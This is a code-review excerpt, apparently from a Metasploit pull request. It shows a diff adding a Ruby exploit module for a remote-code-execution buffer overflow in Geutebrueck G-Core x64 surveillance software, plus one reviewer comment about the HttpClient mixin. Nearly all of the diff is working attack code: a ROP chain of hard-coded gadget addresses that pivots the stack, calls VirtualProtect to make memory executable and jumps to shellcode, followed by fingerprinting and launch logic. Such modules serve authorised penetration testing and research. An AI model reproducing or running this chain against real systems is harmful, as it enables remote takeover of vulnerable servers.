modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb

```diff
@@ -0,0 +1,286 @@
+            # We pop -XXXXX as \xxxxxxxxx to rax
+            # 0x14000efa8  pop rax ; ret
+            stack_align += [0x14000efa8].pack('Q<')
+            stack_align += [0xFFFFFFFFFFFFF061].pack('Q<')
+
+            # Our value is enough.
+            # 0x140cdfe65  | add rax,rdx ; ret
+            stack_align += [0x140cdfe65].pack('Q<')
+
+            # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back.
+            # 0x140cf3110 | mov rsp, rax ; ..... ; ret
+            stack_align += [0x140cf3110].pack('Q<')
+
+            # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9.
+            # We want RCX to hold the value for VP Argument "Address of Shellcode"
+            # 0x140ccb984 |  mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret  ;
+            rop = ''
+            rop += [0x140ccb984].pack('Q<')
+            rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ;
+            # 0x14008f7ec      | POP RDX; RETN
+            # 0x...1000        | Value for VP "Size of Memory"
+            rop += [0x14008f7ec].pack('Q<')
+            rop += [0x0000000000000400].pack('Q<')
+
+            # 0x140a88f81:   | POP R8; RET
+            # 0x...40        | Value for VP "Execute Permissions"
+            rop += [0x140a88f81].pack('Q<')
+            rop += [0x0000000000000040].pack('Q<')
+
+            # 0x1400aa030    | POP R9; RET
+            # 0x...          | Value for VP "Writeable location". Not sure if needed?
+            # 0x140FB5000 is the .data section of gcore; let's test with this writable section...
+            rop += [0x1400aa030].pack('Q<')
+            rop += [0x140FB5000].pack('Q<')
+
+            # 0x140ccea2f: xor rax, rax ; et
+            rop += [0x140ccea2f].pack('Q<')
+
+            # 0x14000efa8 pop rax ; ret
+            # 0x140d83268 | VP Stub IAT Entry
+            rop += [0x14000efa8].pack('Q<')
+            rop += [0x140d83268].pack('Q<')
+
+            # 0x14095b254 mov rax, qword [rax] ; ret  ;
+            rop += [0x14095b254].pack('Q<')
+
+            # 0x140166c46 push rax; ret
+            rop += [0x140166c46].pack('Q<')
+
+            # 0x140cfb98d jmp rsp
+            rop += [0x140cfb98d].pack('Q<')
+
+            [rop, overwrite, stack_align]
+
+        else
+            print_status('ROP chain for this version not (yet) available or the target is not vulnerable.')
+
+        end
+      end
+
+    def exploit
+        if target['auto']
+            checkcode, target = fingerprint
+            if checkcode.to_s.include? 'unknown'
+                print_status('No vulnerable Version detected - exploit aborted.')
+            else
+                target_rop, target_overwrite, target_stack_align = ropchain(target)
+                begin
+                    connect
```

Comment:
If you use `Msf::Exploit::Remote::HttpClient` then you don't need to `connect` here.